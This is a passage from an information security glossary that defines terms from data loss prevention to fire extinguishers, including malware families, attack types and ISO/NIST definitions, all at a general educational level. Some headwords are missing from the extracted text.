Security technology designed to monitor, identify, log/alert and if appropriate block the inappropriate transfer of confidential information through a network port or firewall, for example to prevent workers, malware or hackers disclosing or passing personal information, credit card numbers, trade secrets or other intellectual property to third parties through the Internet, whether by accident or on purpose.  Conceptually similar to IDS/IPS but concerns extrusion rather than intrusion.

(Digital Millennium
Copyright Act)

US law prohibiting technologies/devices that may be used to bypass or defeat software/hardware copy protection mechanisms.

(De-Militarized Zone),
screened subnet

Special network segment between external networks such as the Internet and internal corporate networks, within which proxy servers and firewalls are intended to identify and restrict unauthorized traffic while passing legitimate traffic.  Systems that need to connect to the Internet (such as Web servers, DNS servers, application servers or front-ends, and email servers) are typically located in the DMZ, and are hardenedPerimeter network (also known as a screened sub-net) inserted as a ‘neutral zone’ between networks” (ISO/IEC 27033-1).  “A small network with one or more servers that is kept separate from an agency’s core network, either on the outside of the agency’s firewall, or as a separate network protected by the agency’s firewall. Demilitarised zones usually provide public domain information to less trusted networks, such as the Internet” (NZ information Security Manual).

  See also zone.

(Domain Name System)

Network protocols and systems let us refer to Internet nodes by memorable domain names (such as rather than their numeric IP addresses (such as


Species of RAT malware in the wild in 2019.  Uses DNS tunnelling to communicate with the attacker’s C&C systems.

DNS [cache] poisoning

Attack that subverts DNS systems or records to direct victims covertly to a malicious domain, phishing or infectious website etc. instead of the benign one they anticipated e.g. by ‘poisoning’ cached DNS data with false linkages or by exploiting the ‘zone transfer’ process used to pass data between DNS servers.  See also pharming.


Implies that something (such as a policy, process or plan) is sufficiently stable and understood that it can be written down (‘captured’), and if appropriate then reviewed and approved by other stakeholders.  To have any value and avoid becoming shelfware, documents must be accessed, read and implemented or used, which is where awareness, training, compliance, reinforcement and/or enforcement activities come into play, along with quality factors such as the reading level, clarity, interest etc.  Changes to important documentation also need to be managed to ensure it remains aligned with the subject, relevant, complete and accurate (an integrity control).

Documented information

See document“Information required to be controlled and maintained by an organisation and the medium on which it is contained.  Notes: documented information can be in any format and media and from any source; documented information can refer to the management system, including related processes, information created in order for the organisation to operate (documentation), [and/or] evidence of results achieved (records).” (ISO/IEC 27000).

Domain owner

“A domain owner is responsible for the secure configuration of the security domain throughout its life-cycle, including all connections to/from the domain” (NZ information Security Manual).

Domain slamming

An unethical and barely legal social engineering scam to trick the registered owners of domains into transferring their registrations to a different fee-charging registrar, believing they are merely renewing. 


Neologism derived from domus (Latin for home) and robotics or informatics, meaning home automation, IoT and smart homes in particular.


Copy protection hardware device used to ‘unlock’ (i.epermit access to and use of) software on the particular computer into which it is physically plugged.  Also, a hardware authentication token.  Both forms normally use cryptography and tamper resistance to prevent the devices being illicitly duplicated or fabricated, but the corresponding applications may be vulnerable to hacking, bypassing or negating the protection.

Door open alarm

Physical security arrangement that monitors an access-controlled door, triggering an alarm if it is opened (e.g. opening an emergency fire exit may sound the fire alarm to evacuate the building) or held open much longer than it would take even the slowest person to pass through (e.g. a card access controlled office door propped open for some reason may sound an annoying local ‘peeper’ and/or a silent/remote alarm in the security guard house).  Electronic door open alarms may be manually overridden or silenced for authorized purposes such as office moves or refits, but such overrides should preferably trigger indicators (such as a flashing warning light), automated reminders or cancellation/time-outs to prevent them being forgotten and left in effect beyond the allotted time.


Windows malware in the wild from 2011 to 2016.  RAT spread via infectious websites (including Jamie Oliver’s), social networks, IM and USB devices, delivering various payloads including bank Trojans, keyloggers and DDoS engines.  The botnet’s command-and-control structure was disrupted by the authorities with assistance from technology companies in 2016.

(Denial of Service)

Type of information security incident in which availability is impacted, for example by deliberately or accidentally overloading the system or network, thereby interfering with legitimate business use.  “Prevention of authorized access to a system resource or the delaying of system operations and functions, with resultant loss of availability to authorized users” (ISO/IEC 27033-1).  See also DDoS and DRDoS.

Double agent

An agent who surreptitiously remains loyal to and acts in the interests of one party while giving the appearance of loyalty towards another.  A form of sabotage or cybertage.

Double extension

Operating systems and applications often determine a file’s type according to the final extension on its name, preceded by a period (e.g. files containing executable programs often end with .exe).  Systems may not display the extension for known file types.  Additional periods and characters preceding the final extension (such as .txt.exe) may be treated as part of the file name.  Some malware uses this and other social engineering techniques to fool victims, for instance an email might entreat the user to “open the attached text file containing a disputed invoice”, whereas the attachment is actually a malicious program that executes when the victim opens it.

Double-entry bookkeeping

Accountancy process used since Roman times in which every transaction is recorded as a complementary pair of credits and debits (equal in value but opposite in sign) in the relevant accounts.  Any discrepancy between the running totals of the paired accounts when they are reconciled generally indicates a simple data-entry or calculation error but could point to fraud or theft.


Form or component of malware which downloads additional code (usually the payload) from the Internet.  This arrangement allows criminals to change the malware dynamically, for example to evade antivirus software, attack specific new targets or extend previous attacks.  See also fileless malware.


“Handling processes and movements of products and services that occur after an entity in the supply chain takes custody of the products and responsibility for services” (ISO/IEC 27036-1).

Dox, DoX,
doxing, DoXing

Leet terms derived from “docs” (documents), referring to the process of illicitly gathering and perhaps disclosing personal information on targets by researching their presence on social media and other sources such as hacked personnel databases.  Has harassing, bullying or threatening overtones of coercion, similar to stalking, grooming, snooping, spying and other forms of social engineering.

DoXware, doxware

See leakware.


See data processing.


See disaster recovery.


See SAE.


The ‘urban sport’ of exploring insecure drains, service ducts and other voids as a means of bypassing physical perimeter controls in order to gain unauthorized access to sites and buildings.  A risky, dangerous form of trespass and a significant though underappreciated risk for many otherwise secure places.

(Distributed Reflective
Denial of Service)

Some DDoS attacks use UDP rather than TCP, taking advantage of UDP servers (such as DNS servers) to amplify the volume of traffic, and IP address spoofing to forward the amplified responses to a victim’s system rather than back to the originator.  It is nothing to do with DR-DOS, a PC operating system from Digital Research.


A multifunctional evolving antivirus-evading malware with botnet, bank Trojan and ransomware capabilities.  The FBI tried to disrupt the Dridex infrastructure by blackholing C2 traffic in 2016 but it remained active in the wild in 2019.  In December 2019, two alleged Russian members of Evil Corp (the cybercriminal gang behind Dridex), were indicted for their part in stealing ~$70m from organisations around the globe.

Drive-by download,
Web-inject malware

Mode of malware infection involving the user merely browsing to an infectious website where vulnerabilities in the browser software are silently exploited, usually without the user even being aware of the compromise.

Driver pins

In most physical locks, these standard-length metal cylinders are pushed back against springs into the hull by the variable-length key pins when a key is inserted into the keyway.  Provided the key pins and driver pins meet along a straight shear line due to the correct key having been inserted, the plug can be rotated at the shear line to open or close the lock.

(Digital Rights Management or Digital Restriction Measures)

Cryptographically-based access controls used to permit or deny certain types of use of intellectual property according to the owner’s wishes, potentially exceeding the constraints available under copyright law (e.gfair use can be prevented through technical means).

(Unmanned Autonomous Vehicle)

Unmanned aircraft, normally used for remote surveillance.  Basic drones (toys) are controlled by human operators nearby, while sophisticated military versions (UAVs) may operate semi-autonomously using GPS and intelligent control systems to complete surveillance or attack missions across immense distances.  Raises safety and privacy concerns.

dead drop,
Dead Letter Box

Physical or electronic location where messages, parcels, files etc. may be safely (anonymously, secretly and asynchronously) delivered to a collector, competitor, spy or criminal hacker/cracker.  Modern day spies may use anonymous Internet services, encryption, steganography and covert channels to pass information but still rely on dead drops to pass physical assets such as One Time Pads, goods purchased with stolen credit card numbers, and good ol’ fashioned cash.  See also live drop.


Malware which delivers/contains, unpacks and installs other malware on an infected system.  See also downloader.

(Decrypting RSA with Obsolete and Weakened eNcryption)

Contrived name for a hack that compromises TLS sessions by exploiting a vulnerability in the deprecated SSL v2 protocol, exposing RSA private keys.  See also POODLE and Heartbleed.

(Defend Trade Secrets Act)

US federal law provides some legal protection for confidential proprietary information classed as trade secrets, supplementing state laws and harmonizing the approach.


Form of control requiring the actions of more than one person, for example when two soldiers have to insert and turn their keys at the same moment into locks placed several meters apart in order to launch a missile.

Dual stack device

“A product that implements both IP version 4 and 6 protocol stacks” (NZ information Security Manual).


Technology that can be used for both offensive and defensive security purposes, to wage war and to secure peace.  Strong encryption, for instance, protects information and communications regardless of the nature of the information and the communicating parties: it is valued and used by criminals, terrorists, the authorities including governments, militia and law enforcement, and the public alike.

Due care

Obligation or expectation that fiduciary officers/executives of an organisation duly protect its assets and act in its best interests, just as a prudent person would be expected to do. “The responsibility that managers and their organisations have a duty to provide for information security to ensure that the type of control, the cost of control, and the deployment of control are appropriate for the system being managed” (NIST SP 800-30).  See also negligenceCf. due diligence and duty of care

Due diligence

Assurance activities in preparation for important corporate activities such as mergers, acquisitions and the execution of major contracts.  Also compliance e.g. enforcing policies and ensuring that security controls are effectively protecting valuable information assetsCf. due care and duty of care.


Data file containing authentication credentials such as usernames and passwords or credit/bank card numbers and related information such as the cardholder’s name and the CVV, possibly fullz, stolen by a hacker or carder then made available on the hacker underground.


APT worm similar to and perhaps derived from Stuxnet.

Duress alarm,
duress button

Type of silent alarm that can be triggered by a worker to signal that they are experiencing some form of duress (coercion, threat, hold-up, robbery etc.), typically by hitting a concealed ‘panic button’, releasing a dead-mans-handle or entering a particular combination of keys (such as their normal password or PIN code immediately preceded or followed by, say, the hash symbol) into a system that has been specifically designed and configured to incorporate this facility (such as a bank teller’s workstation or security guard station).

Duty of care

A responsibility, obligation, duty, requirement or expectation to ensure that others are not harmed by one’s action or inaction.  Cf. due care, due diligence.


A bank Trojan capable of man-in-the-middle attacks, monitoring online banking sessions to capture browser snapshots and logon credentials.  Discovered in 2014.

(Evaluation Assurance Level)

An assurance metric indicating the depth and rigor to which secure ICT products are evaluated against the Common Criteria.  EAL 1 is the simplest, most basic level, EAL 7 the most advanced.  “Set of assurance requirements that represent a point on the Common Criteria predefined assurance scale” (CNSSI-4009).  “A level of assurance in the security functionality of a product gained from undertaking a Common Criteria evaluation.  Each EAL comprises a number of assurance components, covering aspects of a product’s design, development and operation” (NZ information Security Manual).

(Enterprise Asset Management)

Structured and often software-assisted processes to manage corporate assets (generally just physical assets such as buildings, machinery/plant, vehicles and infrastructure) from acquisition to disposal, including preventive maintenance and repair activities.

(Emergency Action Plan)

A plan to help people survive life-threatening emergency situations or crises such as active shooters, holdups, attacks by terrorists or criminal gangs, bomb threats or blasts, or natural disasters.  Such events may occur suddenly without warning, hence the EAP and associated exercises aim to help by preparing people for the possibility and practicing their responses (e.g. evacuate, hide or defend yourself).

Easter egg

A Trojan horse function hidden within an otherwise legitimate program.  Although normally benign (such as a simple computer game or audio-visual tribute to the programmers), the fact that a covert function has been coded and passed through program testing hints at a possible governance issue with the SDLC, begging the question “What else might be going on in there?”.  “Hidden functionality within an application program, which becomes activated when an undocumented, and often convoluted, set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening” (NIST SP 800-28).


To listen-in or snoop on someone or something covertly.  May involve literally listening and watching from nearby, or remotely using surveillance equipment such as binoculars, bugs, cameras, spyware, keyloggers and backdoors, network analysers, passive reflectors modulating infrared laser beams, wiretaps etc., with obvious privacy implications.

(Elliptic Curve Cryptography)

Form of public key encryption that relies on the unique mathematical properties of elliptic curves to generate pairs of related keys.

(Electronic Counter-CounterMeasures),
(EleCtronic Protective measures)

Defensive techniques to avoid electronic communications or systems being compromised by an adversary – or indeed by friendly forces – using ECM, for example using spread-spectrum, burst, covert and/or spoof transmissions, and TEMPEST.


NSA-led global mass surveillance program launched in the 1960s in conjunction with what became the Five Eyes.  France has a similar program dubbed ‘Frenchelon’ with satellite ground stations (‘spy stations’) located in mainland France and some of its overseas territories.

(Electronic CounterMeasures)

Offensive techniques to disrupt an adversary’s electronic communications or systems, for instance by jamming their radio links, transmitting false beacons or misleading their automated target-acquisition systems.  The electronic equivalent of chaff (metallic strips dispensed in large numbers by a moving vehicle to confuse radar systems).  See also ECCM.

Economic espionage

Euphemism for state-sponsored industrial espionage (surveillance, spying) directed against foreign corporations and (usually) their intellectual assets.


Activist or extremist who may sabotage organisations they believe to be exploiting and wantonly harming the natural environment through their operations (e.g. mining and oil companies destroying the rain forests, or ‘scientific’ whaling).

[Information security] Education

General knowledge and expertise in relation to recognizing and minimizing information risks through appropriate security controls.  Achieved initially through the school/education system, advice from parents and teachers etc. and then extended through security training and awareness activities during employment, supplementing work and general life experience.  [In general] “Process of receiving or giving systematic instruction, especially at a school or university” (ISO/IEC 19896-1:2018).


Measure of the quality or suitability of something for some purpose.  “Extent to which planned activities are realized and planned results achieved” (ISO/IEC 27000).  “Ability to apply knowledge and skills in a productive manner, characterized by attributes of behaviour such as aptitude, initiative, enthusiasm, willingness, communication skills, team participation, and leadership” (ISO/IEC 19896-1:2018).


Measure of the consumption of resources by something.  “Relationship between the results achieved and resources used” (ISO 9000).

Egress filtering

Blocking of traffic as it exits a network, for example to prevent malware-infected or hacked computers on corporate networks from sending spam or attacking systems on external networks, or to block highly classified information from passing onto an unclassified network.  Cf. ingress filtering.


Covert US government network security monitoring/intrusion detection capability originally developed by US-CERT and deployed in 2004.  The current incarnation, EINSTEIN 3, is being developed by the NSA.  It reportedly monitors traffic flowing through authorized gateways between the internal government network/s and the outside world, while a cloud-based distributed sensor version is (also) under consideration, presumably to counter threats arising from the Internet of Things and proliferating Internet connectivity.

Electronic archive

A long-term data store (see archive).  “Long-term repository of Electronically Stored Information.  Notes: Electronic archives can be on-line, and therefore accessible, or off-line and not easily accessible.  Backup systems (e.g., tape, virtual tape, etc.) are not intended to be electronic archives, but rather data protection systems (i.e., recovery mechanisms for disaster recovery and business continuity).” (ISO/IEC 27050-1).

Electronic discovery,

Discovery that includes the identification, preservation, collection, processing, review, analysis, or production of Electronically Stored Information.  Note: Although electronic discovery is often considered a legal process, its use is not limited to the legal domain.” (ISO/IEC 27050-1).

Elevation or escalation [of privileges]

A multi-stage attack (on a castle, building, system, application, person, organisation etc.) in which an outsider (e.g. an intruder, hacker or malware) first gains entry or a foothold innocuously through an inadequately secured entry-point to a general access level, then exploits internal vulnerabilities to gain further access to and compromise assets that are not directly accessible from outside.  Hackers commonly gain unprivileged access to target systems first (e.g. by registering as a basic user with limited rights), then use commands (often scripted in the form of malware) to exploit technical vulnerabilities, gain privileged or unrestricted access and hence pwn the systems.


Social engineering technique whereby, during an apparently innocuous conversation, someone is surreptitiously probed for additional information.  For example, the question “Was John there with Alan?” might prompt the answer “No, John wasn’t there”.  The respondent’s lack of reference to Alan implies that he was there, hinting at what have been the true purpose of the question.

(ELectronic INTelligence)

Gleaning useful information from the characteristics of electronic signals, aside from any intended communications content, using electronic sensors.  Spectrum analysis and direction-finding techniques, for instance, can be used to characterize and perhaps identify a specific source of radiated electronic signals (not necessarily a radio transmitter as such).  Part of SIGINT.

Electronic Warfare

See cyberwar.

(Electronic mail)

Popular communications mechanism that originally used private commercial networks (such as AOL, CompuServe and internal corporate networks) then transitioned to the Internet in the 1990s.  Emails are sent and received asynchronously, meaning they wait in the recipient’s mailbox until being opened and read, as opposed to real-time and near-real-time online chat systems such as IMVulnerable to numerous information security threats and incidents such as malware, spam, 419s and other frauds, coercion, social engineering, unpredictable delays and occasional non-delivery or mis-delivery of messages, interception or inappropriate and unauthorized disclosure of confidential information, hacking of email servers/systems, spoofing of email headers and message content etc.

Email bomb,
spam bomb

Attempt to fill or overload a victim’s email system by sending huge quantities of spam to it e.g. by deliberately disclosing their email address to known spammers and high-volume mailing lists, causing frustration, cyber harassment and denial of service.

Emanation security

“The counter-measure employed to reduce classified emanations from a facility and its systems to an acceptable level. Emanations can be in the form of RF energy, sound waves or optical signals” (NZ information Security Manual).

  See also TEMPEST and SCIF.

Embedded malware

Malware (such as APTs) hidden so deeply within a system (possibly in the hardware, microcode, firmware, device drivers or operating system kernel) that only competent forensic analysis (possibly involving access to the source code, compilers and specialist tools) may reveal its presence.

Embedded system

Usually a physically small computer system or subsystem, perhaps a thing, encased entirely within a piece of electrical, electronic or mechanical equipment (such as a computerized item of industrial plant, an ICS, used to monitor and control the equipment.  Often based on a pared-down version of the Linux operating system, designed to perform specific functions very efficiently, as opposed to multipurpose computers.  May interface to a SCADA system or the Internet of Things.


Theft of assets entrusted to a fraudster by the victim e.g. deposits stolen by a dishonest fund manager.  See also malfeasance.

Emergency access

Route in to an access-controlled site, building, room, system etc. for use in emergency conditions.  “The process of a system user accessing a system that they do not hold appropriate security clearances for due to an immediate and critical emergency requirement” (NZ information Security Manual).

  See also emergency intervention.

Emergency intervention

Situation in which a competent support person is specifically authorized by management to modify a system directly, typically through a privileged emergency user ID, bypassing or overriding the normal system access controls and code migration processes in order to diagnose and resolve an urgent production issue.

Emergency situation

“A situation requiring the evacuation of a site.  Examples include fires and bomb threats” (NZ information Security Manual).


Multifunctional malware that has evolved from a bank Trojan in 2014 to a loader for various forms of malware today.  In the wild in 2019.

EMP (Electro-Magnetic Pulse) weapon,
HERF (High Energy Radio Frequency) gun

Most electrical and electronic devices are inherently highly vulnerable to extremely strong electromagnetic fields and high voltages (such as those produced by nearby lightning strikes, nuclear explosions or, at close range, Taser-type devices), and/or to the accompanying power surges, unless they are sufficiently well designed, engineered, shielded and protected to be resilient.  EMP-based cyberweapons (missiles, bombs, hand-deployed devices etc.) are intended for cybertage, cyberwar or cyberterrorism, perhaps physically damaging critical parts of the enemy’s cyberinfrastructure, for example CHAMP.

(Enterprise Mobile Security, Enterprise Mobility Suite)

See MDM.

(EMissions SECurity)

Securing systems against compromising emanations e.g. using TEMPEST and Faraday cages. “The protection resulting from all measures taken to deny unauthorized persons information of value that might be derived from communications systems and cryptographic equipment intercepts and the interception and analysis of compromising emanations from cryptographic—equipment, information systems, and telecommunications systems.” (Air Force Air Intelligence, Surveillance and Reconnaissance Agency instruction 33-203, 2011)

Encapsulating security payload

Network security protocol, part of IPsec. “A protocol used for encryption and authentication within IPSec” (NZ information Security Manual).


The first widely-accepted digital forensics support tool-suite, used to examine (acquire, analyse and report) digital evidence.  A commercial product from opentext.


“Collection of information systems connected by one or more internal networks under the control of a single authority and security policy. The systems may be structured by physical proximity or by function, independent of location.” (CNSSI-4009).

Enclave boundary

“Point at which an enclave’s internal network service layer connects to an external network’s service layer, i.e., to another enclave or to a Wide Area Network (WAN)” (CNSSI-4009).


Application of cryptography to maintain the confidentiality of information by preventing anyone without the correct decryption key/s gaining access to or surmising the plaintext content.

End user,

Term used by snooty ICT professionals to refer (often dismissively or disparagingly) to the people who use IT systems, networks, devices, services etc.

End User Computing

The practice of software development, implementation and/or support by citizen programmers.


The use of sanctions to discourage and penalize noncompliance or non-fulfilment of one or more obligations, expectations etc.  Has distinctly negative, demotivational connotations, as opposed to reinforcement.

(Electronic Numerical Integrator And Calculator)

The first Turing-complete (general purpose) electronic computer.  Designed at the University of Pennsylvania by Mauchly and Eckert, ENIAC was delivered to the US Army in 1946 to calculate ballistics tables.  It used 17,500 electronic valves (vacuum tubes) and 1,500 relays, weighed 30 tons and consumed 150kW.  It was programmed mechanically over several days using patch leads and switches.  50 years on, ENIAC was replicated as a single integrated circuit approximately 3½ cm square, similar to a Pentium CPU chip.  See also Colossus.


Process whereby, for example, the physical characteristics of people whose identities have been authenticated by some other means are measured by and registered on biometric security devices, thus associating biometric characteristics with user IDs.


“A natural or legal person engaged in an economic activity, irrespective of its legal form, including partnerships or associations regularly engaged in an economic activity” (GDPR).

Enterprise Risk Management (ERM)

High level corporate governance activity for systematically identifying, assessing, treating and monitoring/tracking risks that are significant to the enterprise or organisation as a whole (sometimes known as ‘bet the farm’ risks), involving aspects such as business/commerce, strategy, politics, health-and-safety, finance, currency, products, markets, environment, people, compliance, technology, information, infrastructure etc.


Inducing or permitting someone to commit a crime that they would have committed anyway (e.g. the police using closely-monitored ‘bait cars’ to entice vehicle thieves) then prosecuting them for so doing.  Cf. entrapment.


Inducing someone to commit a crime they would not otherwise have committed.  Prosecution is likely to fail if the court accepts this as a legitimate defence.  Cf. enticement“Deliberate planting of apparent flaws in an information system for the purpose of detecting attempted penetrations” (CNSSI-4009).


A measure of randomness or disorder.  A high degree of entropy in encryption keys is vital to prevent cryptanalysts directly guessing the keys by brute force, while high entropy in the cyphertext reduces the possibility of revealing useful information through discernible patterns.  Keys generated pseudo-randomly have marginally less entropy than those of the same length generated randomly, a small difference that weakens them.

(Electronic Privacy
Information Center)

Privacy advocacy and activist group, describing itself as a “public interest research center in Washington, DC”.  EPIC website.


Secret US surveillance system allegedly developed by Ed Snowden according to Oliver Stone’s biographical film Snowden.

Equation Group

Hacker group allegedly associated with the NSA.


Mistake, accident, unintended discrepancy etc.  A breakdown or failure of integrity.  Although errors cause a far greater number of information security incidents than deliberate attacks, the effects are usually relatively minor.  Furthermore, errors are often noticed and corrected by the people, systems or devices that caused them, with next to no consequential impact.  Rarely, however, unnoticed/uncorrected errors (such as software bugs and the inappropriate use of statistics) can have extremely serious or grave consequences such as corrupting business- or safety-critical data or leading to bad decisions.


In virtualisation, refers to making an unauthorized connection from a guest system into the hypervisor, host operating system or another guest.  Allows hacking and data leakage between virtual systems, or access from a sandbox to the host.


“A person who ensures that when maintenance or repairs are undertaken to IT equipment that uncleared personnel are not exposed to information” (NZ information Security Manual).


The safekeeping or custodianship of an asset by a trusted person or organisation (the ‘escrow agent’), enabling its release to one or more third parties if certain conditions (usually specified formally in a contract) are met.  Examples include key escrow and source code escrow.  The control hinges on the trustworthiness and competence of the agent.

Escrow fraud

Type of fraud in which an escrow agent betrays the trust placed in them by the owner of assets placed in their care, normally embezzling the assets.

(Electronically Stored Information)

Data“Data or information of any kind and from any source, whose temporal existence is evidenced by being stored in or on any electronic medium.  Notes: ESI includes traditional e-mail, memos, letters, spreadsheets, databases, office documents, presentations and other electronic formats commonly found on a computer. ESI also includes system, application and file-associated metadata such as timestamps, revision history, file type, etc.  Electronic medium can take the form of, but is not limited to, storage devices and storage elements.” (ISO/IEC 27040).

ESI analysis

Forensic examination/study of ESI“Element of an electronic discovery process focused on evaluating Electronically Stored Information for content and context to identify facts, relationships, key patterns, and other features that can lead to improved understanding of an ESI corpus.  Note: Content and context can include key patterns, topics, people and discussions.” (ISO/IEC 27050-1).

ESI collection

Seizure or collection of ESI, usually from a crime scene.  “Element of an electronic discovery process focused on gathering Electronically Stored Information and other related material” (ISO/IEC 27050-1).

ESI identification

“Element of an electronic discovery process focused on locating potential sources and the criteria for selecting potentially relevant Electronically Stored Information” (ISO/IEC 27050-1).

ESI preservation

“Element of an electronic discovery process focused on ensuring that Electronically Stored Information is protected against inappropriate alteration or destruction.  Note: In some matters or jurisdictions, there can be requirements to prevent spoliation of Electronically Stored Information” (ISO/IEC 27050-1).

ESI processing

Extraction of ESI from storage media etc.  “Element of an electronic discovery process focused on extracting Electronically Stored Information and converting it, if necessary, to forms more suitable for ESI review and ESI analysis” (ISO/IEC 27050-1).

ESI production

Providing, revealing or presenting ESI e.g. in court. “Element of an electronic discovery process focused on delivering or making available Electronically Stored Information.  Notes: ESI production can also include getting Electronically Stored Information in appropriate forms and using appropriate delivery mechanisms. ESI production can be to any person or organisation” (ISO/IEC 27050-1).

ESI review

“Element of an electronic discovery process focused on screening Electronically Stored Information based on specific criteria.  Note: In some matters or jurisdictions, Electronically Stored Information that is considered privileged can be excluded from production” (ISO/IEC 27050-1).


See spying.

Essential communications

“Communications whose contents are necessary for the prevention of or relief from disasters and for the maintenance of public order in adverse conditions” (ISO/IEC 27011).


NSA hacking tool exploits a zero-day vulnerability in Windows SMB (Server Message Block).  A month prior to hacker group Shadow Brokers disclosing this and other tools in April 2017, the NSA notified Microsoft who issued a critical patchNetworked systems that were not patched in time (including old Windows systems no longer fully supported) were vulnerable to the Petya, WannaCry and other ransomware outbreaks.


See Wireshark.

Ethics, ethical

Behaviour broadly accepted as appropriate, right and proper, at least within the culture or organisation in which it occurs.  Ethical beliefs and standards vary, however.  A practice considered ethical within the hacker underground, for example, may be entirely unacceptable and inappropriate (unethical) to society at large including information security and law enforcement professionals.

Ethical dilemma

Situation in which ethical constraints, objectives, rules, laws, regulations, directives etc. come into conflict, requiring a worker either to make a difficult personal decision regarding how to resolve the dilemma and achieve the most beneficial or least damaging net outcome, or to seek further guidance from management, trustworthy colleagues etc.

Ethical hacking

Hacking or penetration testing of ICT networks and systems etc. by white hats that is explicitly sanctioned, authorized, permitted or commissioned by their owners for the purposes of identifying known security vulnerabilities.  Normally covered by an explicit contract defining the scope, nature of tests permitted and forbidden, constraints, confidentiality of the results etc.


Hacking/penetration testing tool, capable of mounting MITM attacks on LAN traffic.

European Data Protection Board

European Union body tasked with supervising and coordinating data protection (privacy) arrangements under GDPR across Europe, for instance liaising with and guiding national privacy ombudsmen or supervisory authorities.

(Extended Validation)

Certification authorities may conduct additional checks on applicants for their digital certificates, typically offering the resulting ‘EV’ certificates at a higher price reflecting the additional costs and trustworthiness.  They typically confirm the identity and legal status of the applicant organisation with the relevant national authorities – a kind of corporate background check – as required by the CA/Browser Forum, an industry body.  Several inappropriate certification incidents (mis-issuance) call into question the value of voluntary compliance with an industry code in this area, leading to calls for stronger oversight, tighter regulation and accreditation, if not a complete overhaul of the certification business.


Person who evaluates (checks, tests and compares) something against expectations, requirements or criteria.  “Individual assigned to perform evaluations in accordance with a given evaluation standard and associated evaluation methodology. Note: An example of an evaluation standard is ISO/IEC 15408 with the associated evaluation methodology given in ISO/IEC 18045” (ISO/IEC 19896-1:2018).


Generally, a trivial or benign form of incident, possibly just a small part of a developing situation (perhaps a symptom, indicator, flag or forewarning).  For example, while an event such as single logon failure may simply result from someone forgetting or mistyping their password, it could be the first indication of a determined brute force attack by hackers“Occurrence or change of a particular set of circumstances.  Notes: an event can be one or more occurrences, and can have several causes; an event can consist of something not happening; an event can sometimes be referred to as an ‘incident’ or ‘accident’” (ISO/IEC 27000).  See also information security event.


Information which proves or disproves something.  See also digital evidence and forensic evidence.

Evidence preservation facility

Typically a firesafe, vault, evidence room or similar secure storage facility providing excellent physical protection for forensic evidence“Secure environment or a location where collected or acquired evidence is stored.  Note: An evidence preservation facility should not be exposed to magnetic fields, dust, vibration, moisture or any other environmental elements (such as extreme temperature or humidity) that may damage the potential digital evidence within the facility.” (ISO/IEC 27037).

Evil twin

Network hack using a fake/spoofed public Wi-Fi hotspot that forwards traffic from connected devices to a genuine public Wi-Fi hotspot or otherwise to the Internet.  The evil twin silently intercepts/monitors the traffic and has full access to any unencrypted content.  It may also perform man-in-the-middle attacks, surreptitiously manipulating the traffic en route.


Forensic evidence allegedly demonstrating that someone or something was not involved in an incident, clearing them of blame.  Cf. inculpatory.


An extraordinary occurrence, such as an unusual event, an unanticipated (and therefore potentially unhandled) state, condition, data value or unauthorized noncomplianceCf. exemption“The formal acknowledgement that a requirement of the NZISM cannot be met and that a dispensation from the particular compliance requirement is granted by the Accreditation Authority.  This exception is valid for the term of the Accreditation Certificate or some lesser time as determined by the Accreditation Authority” (NZ information Security Manual).

Exceptions and waivers

“An exception is NOT the same as a waiver.  An exception means that the requirement need not be followed.  A waiver means that some alternative controls or conditions are implemented” (NZ information Security Manual).


(a) Formal signing demonstrating commitment to a legally-binding contract or agreement by duly authorized signatories. (b) Running a computer program. (c) Capital punishment.

Executive management,
executives, ‘the Execs’,
senior management,
top management,
mahogany row etc.

The most senior managers running the organisation (in conjunction with lower management tiers) on a day-to-day basis who are ultimately accountable to stakeholders for protecting and exploiting the organisation’s information assets.  On behalf of the organisation’s legal owners and other external stakeholders, the governing body (normally the Board of Directors) gives executives both the obligation or responsibility and the authority or control over the organisation’s resources, for example ensuring that information risks are identified, assessed and treated in accordance with the organisation’s business objectives, through diligence and due care.  In short, the buck stops here“Person or group of people who have delegated responsibility from the governing body for implementation of strategies and policies to accomplish the purpose of the organisation.  Note: executive management is sometimes called top management and can include Chief Executive Officers, Chief Information Officers, Chief Financial Officers, Chief Information Officers, and similar roles” (ISO/IEC 27000).


Noncompliance explicitly authorized by the relevant authority after due consideration and consultation with information risk and security experts.  Normally limited in duration as well as scope, and compensating controls may be mandated.  The person requesting an exemption, normally the Information Asset Owner or Risk Owner remains personally accountable for the residual risk and any consequential incidentsCf. exception.


Covert extraction of sensitive/valuable information assets from a supposedly secure system, device, network or organisation.  Normally implies that the information is being ‘pushed out’ or ‘carried out’ by an agent within (a person or malware), but it may also be ‘pulled out’ by someone on the outside (a social engineer, hacker etc.).  Cf. infiltration.

Exit strategy

Whereas normally we consider the risks when going into a new situation, there may also be substantial risks involved in staying there and/or in getting out.  With cloud computing for example, a breakdown in the relationship with the CSP may lead to problems for the organisation in retrieving its information and transferring the service to another CSP or in-house.  Preparing a strategy for exiting the relationship gracefully is a form of business continuity management, part of risk management.


The intangible knowledge, wisdom, competence and/or skill that accumulates as one does something repeatedly.  A valuable information asset“Involvement at a practical level with projects related to the field of competence” (ISO/IEC 19896-1:2018).

Expert witness

Person acknowledged to have extensive experience and skill in specialized subjects such as information security or forensics, capable of analysing, presenting and interpreting the facts objectively for the court.  Offers an informed, dispassionate, unbiased opinion on complex forensic evidence.


Verb: to take advantage of or use.  Although in the information security domain the term usually implies a negative, unethical, unwelcome, inappropriate, unauthorized or harmful activity, it can also be positive (e.g. an organisation legitimately exploits its assets and capabilities to achieve its business objectives).  Noun: the hacking program, malware payload, script, tool and/or process used by a threat agent to take advantage of a security vulnerability.  “Sploit” is a leet form.

Exploit kit

See crimeware.


The degree to which a vulnerability could be exploited by a threat.  For example, security vulnerabilities caused by bugs in Internet-facing web servers tend to be far more exposed to hacking than those affecting internal corporate systems, with several layers of protection between them and external hackers.


Outside the organisation’s physical, organisational and network boundary.  Cf. internal.

External context

“External environment in which the organisation seeks to achieve its objectives.  Notes: external context can include the following: the cultural, social, political, legal, regulatory, financial, technological, economic, natural and competitive environment, whether international, national, regional or local; key drivers and trends having impact on the objectives of the organisation; and relationships with, and perceptions and values of, external stakeholders.” (ISO Guide 73).

External party

Term used in the ISO27k standards as a synonym for ‘third party’.  External implies either a separate organisation or a part of the same organisation that is outside the scope of its ISMS


Manual or automated device for putting out fires using an extinguishant gas (such as carbon dioxide, nitrogen or FM-200), liquid (such as water), foam, powder or cloth (fire blanket).  May be portable/hand-held, mounted to a vehicle, or permanently installed within a facility.  A corrective control.


